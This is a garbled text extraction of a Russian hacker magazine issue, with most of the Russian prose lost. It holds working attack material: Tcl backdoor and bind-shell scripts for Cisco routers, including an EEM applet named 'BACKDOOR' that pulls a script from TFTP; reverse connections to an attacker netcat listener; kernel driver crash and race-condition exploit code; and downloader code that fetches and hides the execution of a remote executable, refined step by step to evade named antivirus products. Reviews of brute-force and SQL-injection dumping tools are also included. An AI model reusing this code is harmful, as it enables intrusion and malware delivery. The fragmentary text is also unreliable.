mov rax,qword ptr [rdx+0B8h]
fffffa60`0a60d844
mov rbx,rdx
fffffa60`0a60d847
je
tdx!TdxTdiDispatchClose+0x71
(fffffa60`0a60d8a1)
fffffa60`0a60d849
mov rcx,qword ptr [rax+30h]
fffffa60`0a60d84d
cmp qword ptr [rcx+20h],2

010 Editor
,
WinDbg pykd ( ,
),
.
Python.

, WinDbg. , , ,
. ,
, . , ,
e-mail. z


WinDbg pykd,
[en/ru]:
pykd.codeplex.com/wikipage?referringTitle=Home

kd> $$>a<c:\do2.wds fffffa8001ea1330 24


Driver object at 0xFFFFFA8001EA1330
Invalid function number: must be 0-1B

Debugging Tools for Windows,


WinDbg [en/ru]:
microsoft.com/whdc/devtools/debugging/default.mspx

kd> $$>a<c:\do2.wds fffffa8001ea1350 7


Driver object at 0xFFFFFA8001EA1350
Not a driver object!

,
Windbg [en]:
windbg.info/download/doc/pdf/WinDbg_A_to_Z_color.pdf

, .
,
. ,
X 11 /142/ 10


[en]:
dumpanalysis.org/WCDA/WCDA-Sample-Chapter.pdf

063


Positive Technologies

Shell

TCL-

TFTP-

./tftpboot/
.icmp.tcp

tftp://192.168.1.4/icmp.tcl

[ptsec@maxpatrol~}$ telnet router 2002


Trying 192. 168. 1. 10...
Connected to router.
Escape characters is ' ^].
Cisco router admin console:
Router #

TFTP-
192. 168. 1. 4

CISCO

192. 168. 1. 10

TCL


Cisco Systems
(level 15),
TCL.
, ,

.
TCL (TOOL COMMAND LANGUAGE)
TK, 80- -
; expect IRC-
eggdrop,
apache mod_tcl. IOS, Cisco Tcl, IOS
12.3(2)T (cisco.com/en/US/docs/ios/12_3t/12_3t2/feature/guide/
gt_tcl.html),
Cisco Systems . ,
IOS IVR IP-.
Tcl,
,
:

064



;
;
, ()
;
() .

, TFTP- ,

.
.
X 11 /142/ 10

Shell
[ptsec@maxpatrol~}$ telnet router 2002
Trying 192. 168. 1. 10...
Connected to router.
Escape characters is ' ^].

tclsh tftp://192. 168. 1. 4/icmp.tcl

Cisco router admin console:


Router #
./tftpboot/
.icmp.tcp

TFTP-
()
192. 168. 1. 4

, ,

Telnet.
CTF 2010.
, Tcl
IOS.
TCL- 15 (enable). Tcl
,
, TFTP, FTP, RCP, SCP.
RAM-,
FLASH- c
IOS.
FLASH :
Router# copy tftp://192.168.1.4/script.tcl flash://
script.tcl
Router# tclsh flash://script.tcl

TFTP-:
Router# tclsh tftp://192.168.1.4/script.tcl

TCL-,
TCP/2002 (EXEC).
, (
TFTP).
proc callback {sock addr port} {
fconfigure $sock -translation crlf -buffering line
puts $sock "Cisco router admin console:"
puts $sock " "
puts -nonewline $sock "Router# "
flush $sock
fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
global var
flush $sock
if {[catch {gets $sock line}] ||
[eof $sock]} {
return [close $sock]
}
X 11 /142/ 10

192. 168. 1. 10

catch {exec $line} result


if {[catch {puts $sock $result}]} {
return [close $sock]
}
puts -nonewline $sock "Router# "
flush $sock
}
set port 2002
set sh [socket -server callback $port]
vwait var
close $sh


( EXEC)

- (level 15).
[ptsec@maxpatrol ~]$ telnet router 2002
Trying 192.168.1.10...
Connected to router.
Escape character is '^]'.
Cisco router admin console:
Router#

, Tcl
IOS. IOS,
Tcl, EXEC. ,
clear
line. -
:
1. , (console 0 vty 0 4), ,
exec-timeout 0 0, .
Router>en
Router#conf t
Enter configuration commands, one per line.
CNTL/Z.
Router(config)#line vty 0 4
Router(config-line)#exec-timeout 0 0

End with

2. EEM
(Embedded Event Manager) ,
, . -

065

tclsh tftp://192.168.1.4/ioscat.tcl -ie -oa 192.168.1.4 -op12345

2 !

[plsec@maxpatrol ~]$ nc -l -p 12345
Router#

./tftpboot/
.ioscat.tcp

TFTP-
()
192. 168. 1. 4

192. 168. 1. 10

CISCO
Shell
[ptsec@maxpatrol~}$ telnet router 2002
Trying 192. 168. 1. 10...
Connected to router.
Escape characters is ' ^].

tclsh tftp://192.168.1.4/
ioscat,tcl -ip2002 -oe

Router #
./tftpboot/
.ioscat.tcp

TFTP-
()
192. 168. 1. 4

,
TFTP 20 .
Router(config)# event manager applet BACKDOOR
Router(config-applet)# event timer countdown name
Delay time 20
Router(config-applet)# action 1.0 cli command "enable"
Router(config-applet)# action 1.1 cli command "tclsh
tftp://192.168.1.4/script.tcl"
Router(config-applet)# action 1.2 syslog msg "Backdoor
is executed"

3. TCL- EEM (Embedded


Event Manager) ,
, .

, IOScat
IOSmap, IOScat,
, .
TCL,
Netcat, TCL flash- TFTP-
RAM. TCL . .
(2002 ):

192. 168. 1. 10

(
netcat: nc -l -p 12345)


(2002):
Router# tclsh tftp://192.168.1.4/ioscat.tcl -ip2002
-oa192.168.2.1 -op80

, , -
,
.
IOSmap ,
nmap, , ,
IOS.
TCL- IP- TCP/UDP-,
ICMP. :
Router>en
Router#tclsh tftp://192.168.1.4/iosmap.tcl
192.168.1.1-5 -p20-24,80,443
Loading iosmap.tcl from 192.168.1.4 (via
FastEthernet0/0): !
[OK - 15912 bytes]

Router# tclsh tftp://192.168.1.4/ioscat.tcl -ip2002 oe

( 12345):
Router# tclsh tftp://192.168.1.4/ioscat.tcl -ie
-oa192.168.1.4 -op12345

066

Loading services.list from 192.168.1.4 (via


FastEthernet0/0): !
[OK - 42121 bytes]
Starting IOSmap 0.9 ( http://www.defaultroute.ca ) at
X 11 /142/ 10



[plsec@maxpatrol ~]$ lynx http://192.168.4:2002

tclsh tftp://192.168.1.4/ioscat.tcl ip2002 -oa192.168.2.1 -op80


-
192.168.2.1

./tftpboot/
.ioscat.tcp

TFTP-
()
192. 168. 1. 4

192. 168. 1. 10

, . , ,
:

MaxPatrol

2002-03-01 02:59 UTC


Free Memory on Platform = 29038388
for this scan = 2622514

/ Memory required

Host 192.168.1.1 is unavailable


Host 192.168.1.2 is unavailable

Router# show processes cpu | i Tcl


212
2284
17762
128
0.67% 162 Tcl Serv - tty16
Router# show tcp brief all
TCB
Local Address
659CDABC 192.168.1.10.23
654485B4 *.2002
65CA2D04 *.80

3.68%

Foreign Address
192.168.1.4.5163
*.*
*.*

2.88%

(state)
ESTAB
LISTEN
LISTEN

Host 192.168.1.3 is unavailable


Interesting ports on host 192.168.1.4
PORT
STATE
SERVICE
20/tcp
closed
ftp-data
21/tcp
closed
ftp
22/tcp
closed
ssh
23/tcp
closed
telnet
24/tcp
closed
priv-mail
80/tcp
open
http
443/tcp
closed
https
Host 192.168.1.5 is unavailable
Router#


:
-sP ;
-sT TCP- TCP connect;
-sU UDP- IP SLA.

L,

Cisco Systems.
X 11 /142/ 10

IOS 12.4(4) CPP (Control Plane Policy):


Router# show control-plane host open-ports
Active internet connections (servers and established)
Prot|Local Address|Foreign Address|Service|State
tcp|*:23|*:0|Telnet|LISTEN
tcp|*:23|192.168.1.4:1379|Telnet|ESTABLIS
tcp|*:80|*:0|HTTP CORE|LISTEN
tcp|*:1234|*:0|Tcl Serv - tty163|LISTEN

,

MaxPatrol ( ptsecurity.ru).

, , , Cisco
TCL-.
.
,
IOS .
, Cisco :). z

067


CISS Research Team?




,
Windows
Ring 0.
, ,
, HIPS (Host Intrusion Prevention System)
internet security.
,
,
, .
, , ,
,
,
.
?

068

ioctl


, .
-.
,
,

. ,
- (I/O manager). ,

X 11 /142/ 10

BSOD
trend micro
. ,
- .
, IoCreateDevice.
-.
- (, , ,
..),
(, ). , ,
DRIVER_OBJECT, IRP (I/O Request
Packet) .
DRIVER_OBJECT::MajorFunction, , ,
, IRP_MJ_
MAXIMUM_FUNCTION + 1.
IRP_MJ_MAXIMUM_FUNCTION Driver Development Kit (DDK) 27. ,
, , . IRP :

typedef
NTSTATUS
(*PDRIVER_DISPATCH) (
IN struct _DEVICE_OBJECT *DeviceObject,
IN struct _IRP *Irp
);

DeviceObject (
), Irp , ,
, , .
, , ,
. , CreateFile/OpenFile ( native- NtCreateFile/
NtOpenFile). , ,
,
, , - .
, ,
, IRP_MJ_CREATE.

.
,
,
X 11 /142/ 10

CreateFile. ,
ReadFile, WriteFile DeviceIoControlFile
.
.
,
:
BOOL
WINAPI
DeviceIoControl(
HANDLE hDevice,
DWORD dwIoControlCode,
LPVOID lpInBuffer,
DWORD nInBufferSize,
LPVOID lpOutBuffer,
DWORD nOutBufferSize,
LPDWORD lpBytesReturned,
LPOVERLAPPED lpOverlapped
);

hDevice ,
lpInBuffer nInBufferSize , lpOutBuffer nOutBufferSize
,
.
dwIoControlCode.
, .
-
(
) . -
:
DEVICE TYPE ( 16-31); 0-7FFFh Microsoft,
8000h-0FFFFh ,
. IoCreateDevice
DeviceType .
ACCESS , .
FILE_ANY_ACCESS .
FILE_READ_ACCESS .
FILE_WRITE_ACCESS .
FUNCTION , .
METHOD -.
METHOD_BUFFERED -.
,
,
nInBufferSize nOutBufferSize DeviceIoControl.

069

BSOD


( lpInBuffer). IRP_MJ_DEVICE_CONTROL AssociatedIrp.SystemBuffer
IRP, Parameters.DeviceIoControl.
InputBufferLength IO_STACK_LOCATION. ,
, - . IRP , IoStatus.Information
IRP.
METHOD_IN_DIRECT METHOD_OUT_DIRECT
-.

MDL MdlAddress
IRP. , ,
, .
METHOD_NEITHER ,
. DeviceIoControl.Type3InputBuffer
IO_STACK_LOCATION
, UserBuffer IRP
.

user-mode DDK ProbeForRead/ProbeForWrite.


- METHOD_NEITHER,


IRP- ( DeviceIoControl.Type3InputBuffer
UserBuffer).

ProbeForWrite,
, ,
, , BSD . ,
, ,
. .
,
PASSIVE- APC IRQ Level. DPC
,

.

,
,

070

, ,
..
.
tmtdi:
kd> !devobj tmtdi
Device object (812cc9f0) is for:
tmtdi*** ERROR: Module load completed but symbols
could not be loaded for tmtdi.sys
\Driver\tmtdi DriverObject 816693b8
Current Irp 00000000 RefCount 1 Type 00000022 Flags
00000040
Dacl e12cbbb4 DevExt 812ccaa8 DevObjExt 812ccab0
ExtensionFlags (0000000000)
Device queue is not busy.
kd> !drvobj 816693b8 2
Driver object (816693b8) is for:
\Driver\tmtdi
DriverEntry: f0f0c505 tmtdi
DriverStartIo: 00000000
DriverUnload: 00000000
AddDevice: 00000000
Dispatch routines:
...
[0e] IRP_MJ_DEVICE_CONTROL f0f07b38 tmtdi+0xdb38
<------ IoCtl

, tmtdi tmtdi.sys. , ,
(Kernel Pool Memory Corruption,
DVD):
BSoD:
hDevice = CreateFileA(
"\\\\.\\tmtdi",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL);
inbuff = (char *)malloc(0x4000);
if(!inbuff)
{
X 11 /142/ 10

User
Driver
User
Mode

Subsystem

I/O subsystem

I/O manager
Kernel space
User space

NTDLL.DLL

Kernel
mode

Executive API
I/O manager

NtDeviceIoControlFile

Kermel32.ddl
DeviceIoControl

GUI

File system driver

Device drivers

Hardware abstraction layer

Hardware interfaces
printf("malloc failed!\n");
return 0;
}

(read/write port, timers, clocks, DMA, cache control)

I/O Manager

memset(inbuff, 'A',0x4000-1);
ioctl = 0x220044;
DeviceIoControl(hDevice, ioctl,
(LPVOID)inbuff, 0x10,
(LPVOID)inbuff, 0x10, &cb,NULL);

Syscall


.


(
NtLoadDriver). ,

.
,
(Zw*
Nt* ntdll.dll), (Zw*
ntoskrnl.exe).

, - . , ,
,
GetPreviousMode.
PreviousMode KTHREAD, , .

Race Condition
(RC) ( TOCTTOU). Matousec,
RC, PoC/
Exploit.
,

SSDT-, RC.
1.
;
(RkUnhooker, GMER ) SSDT:
X 11 /142/ 10

ntkrnlpa.exe-->NtCreateKey, Type: Address


change 0x8061A286-->F8D380E6 [Unknown
module filename]
ntkrnlpa.exe-->NtCreateThread, Type:
Address change 0x805C7208-->F8D380DC
[Unknown module filename]
ntkrnlpa.exe-->NtDeleteKey, Type: Address
change 0x8061A716-->F8D380EB [Unknown
module filename]
ntkrnlpa.exe-->NtDeleteValueKey, Type:
Address change 0x8061A8E6-->F8D380F5
[Unknown module filename]
ntkrnlpa.exe-->NtLoadDriver, Type: Address
change 0x80579588-->F8D38113 [Unknown
module filename]
ntkrnlpa.exe-->NtLoadKey, Type: Address
change 0x8061C482-->F8D380FA [Unknown
module filename]
ntkrnlpa.exe-->NtOpenProcess, Type: Address
change 0x805C1296-->F8D380C8 [Unknown
module filename]
ntkrnlpa.exe-->NtOpenThread, Type: Address
change 0x805C1522-->F8D380CD [Unknown
module filename]
ntkrnlpa.exe-->NtReplaceKey, Type: Address
change 0x8061C332-->F8D38104 [Unknown
module filename]
ntkrnlpa.exe-->NtRestoreKey, Type: Address
change 0x8061BC3E-->F8D380FF [Unknown
module filename]
ntkrnlpa.exe-->NtSetSystemInformation,
Type: Address change 0x80605E76-->F8D38118
[Unknown module filename]
ntkrnlpa.exe-->NtSetValueKey, Type: Address
change 0x8061880C-->F8D380F0 [Unknown
module filename]
ntkrnlpa.exe-->NtTerminateProcess, Type:
Address change 0x805C8C2A-->F8D380D7
[Unknown module filename]
ntkrnlpa.exe-->NtWriteVirtualMemory, Type:
Address change 0x805A981C-->F8D380D2
[Unknown module filename]

HTTP://WWW
links

,
ruscrypto.org/netcat_files/File/ruscrypto.2009.027.zip


Windows,

rsdn.ru/article/asm/
driverholes.xml.
ibm.com/developerworks/linux/library/ldevctrl-migration/
wasm.ru/series.
php?sid=9
seclists.org/bugtraq/2003/Dec/351
matousec.com/
info/articles/khobe8.0-earthquake-forwindows-desktopsecurity-software.php

071

IoCtl
2. ,
, , NtCreateKey (POBJECT_
ATTRIBUTES, PUNICODE_STRING).
3. seclists.org/bugtraq/2003/
Dec/351.
4. :
ZwCreateKey = (_ZwCreateKey *) GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "ZwCreateKey");
...
OBJECT_ATTRIBUTES oa;
wchar_t wcKeyName[] = L"\\REGISTRY\\User\\S-1-5-21-861
567501-287218729-1801674531-1003\\Software\\NetScape";
UNICODE_STRING KeyName = {
sizeof wcKeyName - sizeof wcKeyName[0],
sizeof wcKeyName,
wcKeyName
};
...
while ( !_kbhit() )
{
HANDLE hKey;
oa.ObjectName->Buffer = (PWSTR)ptr;
NTSTATUS rc = ZwCreateKey(&hKey, KEY_READ, &oa,
TitleIndex, NULL,
REG_OPTION_NON_VOLATILE, &Disposition);
if ( NT_SUCCESS(rc) )
CloseHandle(hKey);
}
...
DWORD WINAPI Crack(LPVOID Context)
{
POBJECT_ATTRIBUTES oa = (
POBJECT_ATTRIBUTES) Context;
DWORD *ptr = (DWORD*)&oa->ObjectName->Buffer;
SetThreadPriority(GetCurrentThread(),
THREAD_PRIORITY_HIGHEST);
SetEvent(hStartEvent);
while ( true )
{
*ptr = 0x90909090; //

if ( WaitForSingleObject(hStopEvent, 1)
== WAIT_OBJECT_0 ) break;
}
return 0;
}

072

5. . ,
( 8 60),
. BSOD.

.
kd> !analyze -v
Bugcheck Analysis
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be
protected by try-except, it must be protected by a
Probe. Typically the address is just plain bad or it
is pointing at freed memory.

DVD.
,
/ , . ,

:
1. , , ASCII- Unicode-, ,
strlen/wcslen
Page Fault .
2. kernel mode-, .
, . ,
, , .
3. , ,
, .

ZwDuplicateHandle,

,
.

, , HIPS
. . , . , . z
X 11 /142/ 10


icq 884888, http://snipper.ru

X-TOOLS
: WBF.Gold
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: [x26]VOLAND

-
- WBF.Gold

X-Tools [Web] BruteForcer
.

:
POST;
GET;
Basic- (
HEAD);
HTTPS (
HTTPS-);
(GET/POST);
Cookies;

(
);
( ,
, );
:
XML- ()
;
input , .

:

;

;

;
;
;

074


(
);
.

, WBF.Gold
-,

.

, wonted.ru/programms/
wbf-gold

: VPSProxy
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: [x26]VOLAND

- [x26]
VOLAND.

HTTP/HTTPS- PHP GUI-.

,
,

GUI.
. ,
:
HTTPS PHP-;
HTTPS-;

;

SOCKS5-;

- ;
cookies,
(
,
mycookie=value; mycookie2=123;);
;
;

HTTP 1.0;

;
,
, (/

);
;

;

;
;
: tray (
), start ( ),
hidden ( ).

1. gate.php
( 123);

2. URL

/cookies (
),
Use;
3. (
);
4. Start
localhost:2222 (HTTP) localhost:2223
(HTTPS);
5.
:).
:
[dir]\
VPSProxy.exe -tray -start.

forum.antichat.ru/thread227973.
html.
X 11 /142/ 10

Reverse IP

: 0xRILPSIC
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: 0x00

,
webxakep.net
0xRILPSIC (Reverse IP + Link Parse +
SQL Injection Check).
,
:
1. Reverse IP ;
2.
;
3.
SQL-.
:
1. -
, ;
2. 0xRILPSIC Reverse IP (
, IP);
3.
- ;
4.
SQL-;
5. :).
,
IP
.

:
Reverse IP, ;

;
;
HTTP-;

;

;

;

;


links.txt;
(

);
;

;
X 11 /142/ 10

-

SQL-
check.txt;
-;
;
.

.

:

- ;

(

);

;
SQL Injection
,
, SQL- (
);

;

.

http://icq-email-vkontakte.ru/
forum/showthread.php?p=59345.

: rsaUnDumper[sql]
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: rsaReliableS


SQL- . ,
,
SQL-, .

SQL-
!
:
( 1 100 );
HTTP-;
( DDoS );

( MySQL
);

UserAgent Referer;
/ dump (
, );

,
;
,
;
SQL
limit';
, ;
,
;

;
;
-
;
;
.Net Framework 2.0+.



SQL-.
http:// limit,

<{param}>, ...
,
.
http://icq-emailvkontakte.ru/forum/showthread.php?t=8310.

: Small Parser
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: DjFly

,

Small Parser
, DjFly.
uin;pass,
login@mail.ru .. ( ,

).

import.
txt, , Start.

import.txt
export.txt.z

075

MALWARE
deeonis deeonis@gmail.com

KIS2011, NOD32, Avira, McAfee: !


,

. ,
.
. ,
.
,
.
Kaspersky Internet Security 2011,
. ESET NOD32
,
.
ThreatSense, ,

. Avira AntiVir. . , ,
McAfee ,

. , .
, ? .

, -. :

076


LONG res;
TCHAR szUrl[] = _T("http://virhost.com/bin/launch.exe");
TCHAR szTempName[] = _T("C:\\launch.exe");
//
res = URLDownloadToFile(NULL,szUrl,
szTempName,NULL,NULL);
if (res == S_OK) {
ShellExecute(NULL,_T("open"), szTempName, NULL,
NULL, SW_HIDE);
}

- exe- ,
.

.
.
downloader. , ,
X 11 /142/ 10

- .
, ?!
Heur.Downloader, NOD32 probably unknown
NewHeur_PE.

, (
),
.
. .
.
.

.
URLDownloadToFile , ,
ShellExecute ,
. ,
,
URLDownloadFile.
:

LONG res;
//
TCHAR szUrl[] = _T("mqqu?**slwmjvq+fjh*glk*idlkfm+`}`");
TCHAR szTempName[] = _T("F?Yidlkfm+`}`");
//
int key = 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
//
res = URLDownloadToFile(NULL,szUrl,szTempName,
NULL,NULL);
X 11 /142/ 10

if (res == S_OK)
{
ShellExecute(NULL,_T("open"), szTempName,
NULL, NULL, SW_HIDE);
}

, szUrl szTempName
.
. , ,
decrypt , . ,
,
, , .
, . , ,
, Heur.Downloader. NOD32
, ,
probably unknown NewHeur_PE.
Avira McAfee, TR/
Downloader.Gen Suspect-D!2B731345A4DA .
, .
. ,
.

. , .
,
- (,
),

.
, , . 2000001 (, ?). ,
, ,
, .

077

MALWARE


.
,

, .

. :

//

,
Malware
, ,
. ,
,
: , .
,
, ,
, - .
,
, . , McAfee,
,

. , deeonisa
,
,
, .
, .

,
, .

078

// ...
for (size_t i = 0; i <= 2000000; i++)
{
//
int key = (i%5)-(i%5) + 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
}
//
// ...

,
(, ),
, ,

McAfee?
McAfee , , ,

exe-. ,
API-, , McAfee .
,
, .
, .
, , .
API , McAfee .
,
CreateFile ntldr,

.
X 11 /142/ 10

//
// ...

key
CommandLineToArgvW. , , , ,
,
, .
, McAfee, . ,
Antivir . McAfee
. , .


. , .
: CreateFile
ntldr, .
, , INVALID_HANDLE_VALUE.
, :

Avira
/. KIS2011 ,
.
. NOD32 , Kaspersky
, . , .
! AntiVir
TR/Downloader.Gen. McAfee

Suspect-D!601711206FB9. ,
:
. McAfee ,
.

.
, ,
.
.

,
.
API.

Windows, , , ,
API. , API. ,
CommandLineToArgvW ,
.
,

.

CreateFile
//
//
HANDLE h = CreateFileA("c:\\ntldr",
FILE_READ_ACCESS, 0, 0, OPEN_EXISTING, 0, NULL);
// if
if (h != INVALID_HANDLE_VALUE)
{
int key = 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
}
//
// ...

, ,
, INVALID_HANDLE_VALUE, , ,
.
Scan . KIS . NOD32
Avira AntiVir. McAfee ,
Suspect-D!73AD7FD9A4E5. McAfee
.

API- Windows:
CreateFile GetLastError. ,
CreateFile ,
, , - ghj12lkfd0fivndsi83s.cj8.
GetLastError
ERROR_FILE_NOT_FOUND.
.

CommandLineToArgvW
//
// ...

GetLastError
//
//

//
int key;

// GetLastError
HANDLE h = CreateFile(
_T("c:\\jdksjf9i34ufhvnmfieru834gfbher.xls"),
FILE_READ_ACCESS, 0, 0, OPEN_EXISTING, 0, NULL);
DWORD key = GetLastError();
key +=3;
decrypt(szUrl,key);

CommandLineToArgvW(lpCmdLine, &key);
decrypt(szUrl,key);
decrypt(szTempName,key);
X 11 /142/ 10

079

MALWARE

URLDownloadToFile
ShellExecute. :

//
TCHAR szUrl[] = _T("mqqu?**slwmjvq+fjh*glk*idlkfm+`}`");
TCHAR szTempName[] = _T("F?Yidlkfm+`}`");
void thr1()
{
Sleep(0);
int key = 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
}

Avira AntiVir Personal


decrypt(szTempName,key);
//
// ...

, ,
GetLastError CreateFile,
API,
.
. ,
, , . Kaspersky
, . , , Heur.
Downloader. NOD32.
. ,
McAfee .

.
. .
. -

int APIENTRY _tWinMain(HINSTANCE hInstance,


HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
DWORD p;
HANDLE t1=CreateThread(0,0,
LPTHREAD_START_ROUTINE)&thr1,0,0,&p);
Sleep(3000);
//
// ...
}

, Sleep.
, . 100%

.
. , , McAfee, KIS2011 . 32
Avira . ,
, AntiVir.
.

7

, McAfee , -
. .
-, ,
McAfee 8. - .
. ,
.
.

1
2
3
4
5
6
7
8

080

KIS2011

NOD32

Avira AntiVir

McAfee

+
+
+
+
4 8

+
1 8

+
+
2 8

+
+
+
+
+
+
+
7 8

.
,

(event).
, ,
e_Heur.
.
:

//
TCHAR szUrl[] = _T("mqqu?**slwmjvq+fjh*glk*idlkfm+`}`");
TCHAR szTempName[] = _T("F?Yidlkfm+`}`");
void thr1()
{
HANDLE event = OpenEvent(SYNCHRONIZE ,FALSE,
_T("e_Heur"));
WaitForSingleObject(event,INFINITE);
int key = 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
X 11 /142/ 10

}
int APIENTRY _tWinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
HANDLE event = CreateEvent(NULL, TRUE, FALSE,
_T("e_Heur"));
DWORD p;
HANDLE t1=CreateThread(0,0,
LPTHREAD_START_ROUTINE)&thr1,0,0,&p);
Sleep(2000);
SetEvent(event);
Sleep(2000);
//
// ...
}


. ,
6. McAfee , NOD32 , ,
.

McAfee
}

//
HMODULE hModule = LoadLibrary(_T("urlmon.dll"));
URLFUNC urlProc = (URLFUNC)GetProcAddress(hModule,
szUrlDownload);

,
API- .
, ( , McAfee) .
URLDownloadToFile ShellExecute, .
:

hModule = LoadLibrary(_T("shell32.dll"));
EXECFUNC execProc = (EXECFUNC)GetProcAddress(hModule,
szShellExec);

API
typedef HRESULT (__stdcall *URLFUNC)(LPUNKNOWN,LPCTSTR,
LPCTSTR,DWORD,LPBINDSTATUSCALLBACK);
typedef HINSTANCE (__stdcall *EXECFUNC)(HWND,LPCTSTR,
LPCTSTR,LPCTSTR,LPCTSTR,INT);
int APIENTRY _tWinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
LONG res;
//
TCHAR szUrl[] =
_T("mqqu?**slwmjvq+fjh*glk*idlkfm+`}`");
TCHAR szTempName[] = _T("F?Yidlkfm+`}`");
//
TCHAR szUrlDownload[] =
_T("PWIAjrkijdaQjCli`R");//_T("URLDownloadToFileW");
TCHAR szShellExec[] =
_T("Vm`ii@}`fpq`R");//_T("ShellExecuteW");
HANDLE h = CreateFileA("e:\\ntldr",
FILE_READ_ACCESS, 0, 0, OPEN_EXISTING, 0, NULL);
if (h != INVALID_HANDLE_VALUE)
{
int key = 5;
decrypt(szUrl,key);
decrypt(szTempName,key);
decrypt(szUrlDownload,key);
decrypt(szShellExec,key);
X 11 /142/ 10

//
res = (urlProc)(NULL,szUrl,szTempName,NULL,NULL);
if (res==S_OK)
{
(execProc)(NULL,_T("open"), szTempName,
NULL, NULL, SW_HIDE);
}
}

( ntldr
CreateFile),
API, ,
ShellExecuteW URLDownloadToFileW.
GetProcAddress
.
.

. NOD32 Avira AntiVir
, , , .
McAfee. , .
API
Made in USA.
.
, .

. ESET NOD32
. Avira AntiVir
2 8. . McAfee, . z

081

MALWARE
, Senior Malware Analyst Heuristic detection group, Kaspersky Lab.


Zeus

, ][ , Zeus.
2007 .
,
.


.

(
.

082

.) , Trojan-Spy.Win32.Zbot.
anyz.

,
: , ,
X 11 /142/ 10

. 2. ResHacker
Dialog Zbot
1. DataDirectory PE- Zbot Hiew

. 3. Zbot

. 4.
Zbot

.
, PE-, ..
, .
Zbot: , , ..
, .

, , , ,
. ,
IDA 5.1 Hexrays.

CALL, /
[EBP + xx].
3.

API-,
FakeAPI.
,

. , ,
, HiliteMenuItem,
, , ,
:).
, , VirtualAlloc,
,
. 4 ,
IDA. , ,
UPX, .

-,

Hiew, UPX
, .
, RVA
0x1000, UPX0,
Physical Size . ,
, ImageBase + 0x1000
VirtualSize UPX0, . , , , .
.
ResHacker, Dialog
. , . -,
, Zbot
.
Hiew, 1.
, . ,
- .
UPX, .
PE .
X 11 /142/ 10

,
VirtualAlloc . ,
PEB (Process Environment Block).
ReadOnlyStaticServerData, ,
Introduction to NT Internals : This field has a pointer

083

MALWARE

. 7. Spy++


,
API,

FakeAPI

to a pointer to a system-wide shared memory location (read-only).


It is usually empty. , ,

C:\WINDOWS.
.
.
NtQuerySystemInformation
0xAD SYSTEM_
PERFOMANCE_INFORMATION .
,
PE. PETools LordPE + ImpRec 1.6 (PETools , ).
, Zeus, ,
-, . ,
,
. ,
Zeus C ,
, , . , , .
VMWare
IDA.
, FileMon, RegMon, Process Explorer
PETools LordPE. , IDA
Hex-Rays, ASM- C. . , (. . 5).
, Zbot : -f,
-i, -n, -v. , -I Information,
MessageBox
( . 6). -n ( Zeus Application Data

084

). -v

GetMessageW. , , ,
.
,

. . ,
,

. , Zeus ,
; ( ):
@echo off
:d
del "c:\zbot.exe"
if exist "c:\zbot.exe" goto d
del /F "C:\DOCUME~1\antonie\LOCALS~1\Temp\
tmp8c7f7853.bat"

, ,
, , .
,
.
Zeus cabinet.dll,
FCICreate, FCIAddFile, FCIFlushCabinet . cab-,
.
nspr4.dll The Netscape Portable Runtime
(NSPR), allows compliant applications to use system
facilities such as threads, thread synchronization, I/O, interval timing,
atomic operations, and several other low-level services in a platformindependent manner.
NSPR: PR_OpenTCPSocket,
PR_Close, PR_Read, PR_Write . X 11 /142/ 10

. 8. Zeus ****case.cc


,




. 6. Zbot -i
. Zeus
****case.cc,
. ,
, . IP-.
clean-mx.de
(. 8).
, Zeus , (
, . ,
).
, ,
, Zeus, .

. 5. Hex-Rays ,

Zeus #32768,
ConsoleWindowClass, CiceroUIWndFrame, MDIClient, SysListView32.
,
,
CiceroUIWndFrame. Spy++
Microsoft Visual Studio.
X 11 /142/ 10

Zeus . ,
,
, , .
, ,

.
, ,
, .
, , ,
,
. , Zeus
, ,
-i. z

085


Mifrill (mifrill@real.xakep.ru); (toxa@real.xakep.ru)

CHAOS
CONSTRUCTIONS 2010
IT-
, ,
, .
(
) : - ,
, ,
. ,
, !
Chaos Constructions ,
.

,
Chaos Constructions 2009,
, ,
, .
, CC
1995

ENLiGHT, Chaos Constructions.
ENLiGHT


,
. , , ,
,
, - .

,
, ,

. ,
, ,

086
074

.
CC 90-,
2000-,
, ,
. 1999
Chaos Constructions
.
CC

2006 . , ,
,
, , , ,
.
CC ,
,

. Chaos Constructions
,

(
) .
,

CC10
? ENLiGHT,
, 15
, ,
.
, Chaos Constructions
15-, , 13-
. 15
ENLiGHT,
.
, ,
. ,
,
, : ,
,
, , . , ,
, ,
.
, ? ,
, , .
,
, ANSI- ASCII-,
. ,
, ,
. ,
X 10 /141/ 10




,

, ,

ZX Spectrum, .
.
, (
).

,
,
, 64k Intro 512b Intro, , . , .
,
, ( ,

!), ,
, .
,
Assembly
,
,
:).

2010
- Chaos Constructions,
28-29 ,

-
47.
X 10 /141/ 10

CC


,
, ,
,
.
CC , ,
. CC10
,
(
Combined 64k
Intro, Combined 4k Intro, Combined Demo,
ZX Spectrum 640k Demo, Combined Tiny MP3
Music, Oldschool Tiny Music ..),
ZX
Spectrum Graphics ZX Spectrum Coding.
CC
(
),

, .
,
.

,
.

: .
http://
party10.cc.org.ru. FTP HTTP CC10

.
,
, Chaos
Constructions 2010
(
40). ,
,
,
.
, , , ,
.

,
.
CC ,

,
. , ,
,
, -, :

Real-time Graphics
Real-time Music. , ,
,

( ?!). ,

. ,

,
. ,

087


Chaos Constructions
,
, -
, ,
.
, CC ,
, ..,

.

, , CC10 . ,

,
.
, , ,

. - Mortal Combat,
(Battle City) Dendy.


Starcraft 2,
Guitar Hero 5 ,

Quake 3 CTF. ,
(
, ,
7 34 !)
Ethernet ,
ART
. -
, ,

